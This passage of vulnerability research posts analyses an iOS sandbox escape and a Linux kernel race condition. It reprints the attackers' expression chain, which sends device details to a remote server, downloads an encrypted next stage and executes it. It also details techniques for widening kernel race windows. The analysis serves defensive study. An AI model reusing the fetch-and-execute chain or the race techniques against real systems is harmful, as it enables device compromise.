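    """Stand-in for an unrelated, far more powerful class."""


def check_argument(obj, declared_type) -> bool:
    """Accept obj when it is an instance of declared_type or any subclass."""
    return isinstance(obj, declared_type)


# A narrow declaration still admits every subclass of that type...
subclass_ok = check_argument(SpecialIdentity(), Identity)
# ...but rejects unrelated classes.
narrow_rejects = not check_argument(Predicate(), Identity)
# Declaring the root type admits everything.
root_accepts = check_argument(Predicate(), object)
```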

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;
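The same search is easy to script when further filtering is needed. The Python sketch below applies the egrep pattern to a small in-memory sample: the first two declarations are the matches listed above joined onto single lines, and the third is an invented non-matching line added for contrast.

```python
import re

# Same pattern as the egrep command.
NSOBJECT_ARG = re.compile(r"\(NSObject \*\)arg")

HEADER = "\n".join([
    "-(void)evaluateMobileSubscriberIdentity:"
    "(CTXPCServiceSubscriptionContext *)arg1 identity:(NSObject *)arg2 "
    "completion:(void (^)(NSError *))arg3;",
    "-(void)setWiFiCallingSettingPreferences:"
    "(CTXPCServiceSubscriptionContext *)arg1 key:(NSString *)arg2 "
    "value:(NSObject *)arg3 completion:(void (^)(NSError *))arg4;",
    # Hypothetical declaration with no NSObject* argument.
    "-(void)exampleWithString:(NSString *)arg1;",
])


def find_nsobject_args(text: str):
    """Return (line_number, line) pairs for declarations taking NSObject*."""
    return [
        (number, line)
        for number, line in enumerate(text.splitlines(), 1)
        if NSOBJECT_ARG.search(line)
    ]


hits = find_nsobject_args(HEADER)
```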

The evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

  context:X

  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation to mark the predicate as safe for evaluation and then call evaluateWithObject: to evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() } }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

                     @"/System/Library/AccessibilityBundles/\

                         AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

    NSError* err;

    [bundle loadAndReturnError:&err];

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/PrivateFrameworks/\

    AccessibilityUtilities.framework/AccessibilityUtilities',

 '/System/Library/PrivateFrameworks/\

    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?
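Finding such a chain is a shortest-path search over the library dependency graph. A minimal Python sketch follows, assuming the graph has already been collected: the edges are hand-written from the chain listed above, not parsed from real otool -L output, and the short names are abbreviations of the full paths.

```python
from collections import deque

# Hand-written edges from the chain above; a real run would fill this in
# from `otool -L` output for each library.
DEPENDS_ON = {
    "AXSpeechImplementation": ["AccessibilityUtilities"],
    "AccessibilityUtilities": ["AccessibilitySharedSupport"],
    "AccessibilitySharedSupport": ["Sharing"],
    "Sharing": ["PrototypeTools"],
    "PrototypeTools": [],
}


def dependency_chain(start: str, goal: str, graph: dict):
    """Breadth-first search returning the shortest load chain, or None."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for dependency in graph.get(path[-1], []):
            if dependency not in seen:
                seen.add(dependency)
                queue.append(path + [dependency])
    return None


chain = dependency_chain("AXSpeechImplementation", "PrototypeTools", DEPENDS_ON)
```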

Predicated Sections

[PTRow initWithCoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate

                           forKey:@"condition"]

  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]

  }

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.
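The interaction between the evaluation flag and the two initWithCoder: implementations can be modelled in a few lines of Python. This is a simplified sketch, not Apple's code: the class and method names are stand-ins, a row without a condition is assumed to be enabled, and a harmless callable that records that it ran takes the place of the attacker's predicate.

```python
class Predicate:
    def __init__(self, func):
        self._func = func
        self._evaluation_allowed = True  # built locally, so trusted

    @classmethod
    def decode(cls, func):
        """Model of deserialization: evaluation stays disabled until allowed."""
        predicate = cls(func)
        predicate._evaluation_allowed = False
        return predicate

    def allow_evaluation(self):
        self._evaluation_allowed = True

    def evaluate(self, obj):
        if not self._evaluation_allowed:
            raise PermissionError("predicate not marked safe to evaluate")
        return self._func(obj)


class Row:
    def __init__(self, decoded_condition):
        self.condition = decoded_condition
        # The modelled flaw: the flag is cleared without any validation.
        self.condition.allow_evaluation()


class Section:
    def __init__(self, rows, settings=None):
        self.settings = settings
        self.rows = list(rows)
        self.enabled_rows = [row for row in self.rows if self._should_enable(row)]

    def _should_enable(self, row):
        if row.condition is not None:
            return row.condition.evaluate(self.settings)
        return True  # assumption: rows without a condition are enabled


log = []
payload = lambda _settings: log.append("evaluated") or True

# Evaluating a freshly decoded predicate directly is refused...
try:
    Predicate.decode(payload).evaluate(None)
    blocked = False
except PermissionError:
    blocked = True

# ...but decoding it inside a section evaluates it as a side effect.
section = Section([Row(Predicate.decode(payload))])
```

The mitigation holds only until some deserializer in the process clears the flag and another one evaluates the result.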

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]

   setObject:

     @[[NSURLComponents

         componentsWithString:

         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

   forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

  bundleWithPath:@"/System/Library/PrivateFrameworks/\

     SlideshowKit.framework/Frameworks/OpusFoundation.framework"

 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]

  setQueryItems:

    [ [ [NSArray arrayWithObject:

                 [NSURLQueryItem

                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"u"

                    value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".
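The pattern of independent expressions sharing state through a global dictionary, and then attaching the three query items, can be sketched in Python. The host is a placeholder because the real URL is redacted, the function names are hypothetical, and the parameter values are the example strings quoted above.

```python
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Stand-in for the process-wide dictionary the expressions share.
shared = {}


def store_base_url():
    # Placeholder host; the real URL is redacted in the source.
    shared["0"] = "https://example.invalid/XXX/XXX/XXX"


def set_query_items(model: str, build: str, nonce: str):
    # Fetch the value a previous step stored, update it, and store it back.
    parts = urlsplit(shared["0"])
    query = urlencode({"m": model, "v": build, "u": nonce})
    shared["0"] = urlunsplit(parts._replace(query=query))


# Each step is independent; only the shared dictionary links them.
steps = [
    store_base_url,
    lambda: set_query_items("iPhone12,3", "18A8395", "394681493"),
]
for step in steps:
    step()

final_url = shared["0"]
```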

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedStrings]

  setObject:

    [NSPropertyListSerialization

      propertyListWithData:

        [[[NSData

             dataWithContentsOfURL:

               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)

      errors:Class(NSConstantValueExpression)

  ]

  forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full URL from the query string parameters set earlier. That URL is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".
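The decompress-then-parse half of that pipeline can be sketched with Python's standard library. The AES step is left out because the standard library has no AES implementation, the input is a toy plist built locally, not real next-stage data, and the exact compression framing used on the device may differ from what `zlib.compress` produces.

```python
import plistlib
import zlib


def parse_next_stage(decrypted: bytes) -> dict:
    """Decompress an already-decrypted blob and parse it as a plist."""
    return plistlib.loads(zlib.decompress(decrypted))


# Toy input standing in for the decrypted download; the "a" key mirrors the
# key name mentioned in the post, its value here is invented.
sample = zlib.compress(plistlib.dumps({"a": "1 + 1"}))
stage = parse_next_stage(sample)
```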

Expression 5

[ [[NSThread mainThread] threadDictionary]

  addEntriesFromDictionary:

    [[CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's threadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

      objectForKey:@"1"]

    objectForKey: @"a"]

  ]

  expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "com.apple.PrototypeTools")) {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition"]

...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Racing against the clock -- hitting a tiny kernel race window

By: Ryan
24 March 2022 at 20:51

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (I found it while trying to explain to someone how the fix for CVE-2021-0920 worked: I was explaining why the Unix GC is now safe, then got confused because I couldn't actually figure out why it's safe after that fix, and eventually realized that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT. (With CONFIG_PREEMPT, it is possible to preempt a thread with another thread, as I described at LSSEU2019.)

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
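To make the "inflight" references concrete, here is a minimal userspace sketch of SCM_RIGHTS file descriptor passing. It is not taken from the reproducer; the helper names send_fd() and recv_fd() are made up for illustration. While a message sent this way sits in the receiver's queue, the passed file is referenced from the queued SKB rather than from any FD table, and if a socket's own FD is queued on itself (or on a peer that is queued on it) and all FDs are then closed, only the GC can break the resulting reference loop.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical helper: send one file descriptor over a UNIX domain socket.
 * Returns 0 on success, -1 on error. */
static int send_fd(int sock, int fd_to_send)
{
    assert(fd_to_send >= 0);
    char payload = 'F'; /* stream sockets need a byte of data to carry ancillary data */
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union {
        struct cmsghdr hdr; /* forces correct alignment of buf */
        char buf[CMSG_SPACE(sizeof(int))];
    } control;
    struct msghdr msg;

    memset(&control, 0, sizeof(control));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive one file descriptor sent with send_fd().
 * Returns the new FD number, or -1 on error. */
static int recv_fd(int sock)
{
    char payload;
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union {
        struct cmsghdr hdr;
        char buf[CMSG_SPACE(sizeof(int))];
    } control;
    struct msghdr msg;
    int fd = -1;

    memset(&control, 0, sizeof(control));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS ||
        cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

Between send_fd() and recv_fd(), the kernel counts the passed file as inflight; that count is what the GC compares against the file's refcount.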

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

Meanwhile, __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.
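The "grab pointer, increment refcount, recheck pointer" idea can be modelled in userspace with C11 atomics. The following is only a sketch under simplifying assumptions, not the kernel's code: struct file_model, fd_slot_t and all function names are invented, a single atomic pointer stands in for the FD table entry, and nothing is ever freed.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-in for struct file: only the refcount matters here. */
struct file_model {
    atomic_long f_count;
};

/* Toy stand-in for one file descriptor table entry. */
typedef _Atomic(struct file_model *) fd_slot_t;

/* Add `refs` references unless the count is already zero
 * (this models what get_file_rcu_many() does). */
static bool get_unless_zero(struct file_model *f, long refs)
{
    assert(refs > 0);
    long old = atomic_load(&f->f_count);
    while (old != 0) {
        /* on failure, `old` is refreshed with the current value */
        if (atomic_compare_exchange_weak(&f->f_count, &old, old + refs))
            return true;
    }
    return false;
}

static void put_refs(struct file_model *f, long refs)
{
    atomic_fetch_sub(&f->f_count, refs);
}

/* Second half of the lookup: `candidate` was loaded from `slot` earlier.
 * Narrow "any RCU-accessible state" to "refcounted", then to "live". */
static bool upgrade_to_live_ref(fd_slot_t *slot, struct file_model *candidate,
                                long refs)
{
    if (!get_unless_zero(candidate, refs))
        return false; /* refcount already hit zero */
    if (atomic_load(slot) != candidate) {
        /* Refcounted, but no longer provably live: back off. */
        put_refs(candidate, refs);
        return false;
    }
    return true;
}

/* Full lookup loop. Like the kernel loop it is modelled on, it relies on
 * the slot being updated once the old object can no longer be grabbed. */
static struct file_model *fget_model(fd_slot_t *slot, long refs)
{
    for (;;) {
        struct file_model *f = atomic_load(slot);
        if (!f)
            return NULL;
        if (upgrade_to_live_ref(slot, f, refs))
            return f;
    }
}
```

Splitting out upgrade_to_live_ref() makes the race window explicit: anything that empties the slot between the initial load and the recheck causes the extra references to be dropped again instead of being handed to the caller.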

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed.

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,
                                 fmode_t mask, unsigned int refs)
{
        struct file *file;
        rcu_read_lock();
loop:
        file = files_lookup_fd_rcu(files, fd); // race window start
        if (file) {
                /* File object ref couldn't be taken.
                 * dup2() atomicity guarantee is the reason
                 * we loop to catch the new file (or NULL pointer)
                 */
                if (file->f_mode & mask)
                        file = NULL;
                else if (!get_file_rcu_many(file, refs)) // race window end
                        goto loop;
        }
        rcu_read_unlock();
        return file;
}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax
<__fget_files+0x21> sbb    rax,rax
<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]
<__fget_files+0x28> and    eax,r8d
<__fget_files+0x2b> lea    rax,[rdx+rax*8]
<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START
; r12 now contains file*
<__fget_files+0x32> test   r12,r12
<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>
<__fget_files+0x37> mov    eax,r9d
<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)
<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>
<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)
<__fget_files+0x46> lea    rdx,[r12+0x38]
<__fget_files+0x4b> test   rax,rax
<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>
<__fget_files+0x50> lea    rcx,[rsi+rax*1]
<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter (TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

